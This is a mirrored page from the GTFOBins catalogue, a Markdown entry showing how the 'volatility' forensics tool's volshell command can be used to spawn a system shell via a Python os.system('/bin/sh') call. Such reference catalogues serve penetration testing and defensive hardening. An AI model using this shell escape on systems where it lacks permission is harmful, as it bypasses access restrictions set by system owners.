mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
c056acd2e2
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
9 lines
338 B
Markdown
9 lines
338 B
Markdown
---
|
|
description: This command requires some valid coredump file which, if not available, can be uploaded to the target. The `volshell` command spawns a [`python`](/gtfobins/python/) shell, other functions may apply.
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
volatility -f file.dump volshell
|
|
__import__('os').system('/bin/sh')
|
|
---
|